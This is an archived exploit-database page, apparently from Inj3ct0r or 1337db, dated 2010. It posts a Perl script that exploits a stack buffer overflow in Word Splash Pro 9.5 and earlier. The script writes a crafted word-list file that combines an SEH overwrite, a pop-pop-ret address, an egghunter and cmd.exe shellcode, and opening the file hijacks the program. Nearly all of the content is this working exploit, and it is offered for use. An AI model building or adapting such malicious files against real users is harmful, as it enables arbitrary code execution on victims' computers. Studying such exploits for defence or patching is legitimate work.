Home / os / win7

[local exploits] - Word Splash Pro <= 9.5 Buffer Overflow

Posted on 20 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Word Splash Pro &lt;= 9.5 Buffer Overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Word Splash Pro &lt;= 9.5 Buffer Overflow by h1ch4m in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>====================================== Word Splash Pro &lt;= 9.5 Buffer Overflow ====================================== # Exploit Title: Word Splash Pro &lt;= 9.5 Buffer Overflow -EggHunter- # Software Link: http://www.chronasoft.com/software/wordsplashpro # Version: &lt;= 9.5 # Tested on: Win XP SP3 French # Date: 20/12/2010 # Author: h1ch4m #Email: h1ch4m@live.fr #Home: Net-Effects.blogspot.com #Greetz : Peter Van Eeckhoutte, Exploit-Database Team, Zhir0 #Note: tested on version 9.5 &amp; 8.3, you may have to change the address of pop pop ret according to your sp &amp; the program version # triggering details: file-&gt;Word list-&gt;Import then click on Word List Builder button my $file = &quot;1.wsl&quot;; my $size = 4112; my $nseh = &quot;xebx06x90x90&quot;; # jump 6 bytes my $seh = pack(&#039;V&#039;, 0x01de44dc); # pop pop ret from CRDE2000.DLL my $egg = &quot;w00tw00t&quot;; my $egghunter = &quot;x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8&quot;. &quot;x77x30x30x74&quot;. &quot;x8BxFAxAFx75xEAxAFx75xE7xFFxE7&quot;; # Shellcode : windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes - Mountassif Moad aka Stack # http://www.exploit-db.com/exploits/13510/ my $shellcode = &quot;x8BxECx33xFFx57&quot;. &quot;xC6x45xFCx63xC6x45&quot;. &quot;xFDx6DxC6x45xFEx64&quot;. &quot;xC6x45xF8x01x8D&quot;. &quot;x45xFCx50xB8xC7x93&quot;. &quot;xBFx77xFFxD0&quot;; my $junk = &quot;x90&quot; x ($size-length($egg.$shellcode)); open($FILE,&quot;&gt;$file&quot;); print $FILE $egg.$shellcode.$junk.$nseh.$seh.$egghunter; close($FILE); print &quot;File Created successfully &quot;; sleep(1); # <a href='http://1337db.com/'>1337db.com</a> [2010-12-20]</pre></body></html>

 

TOP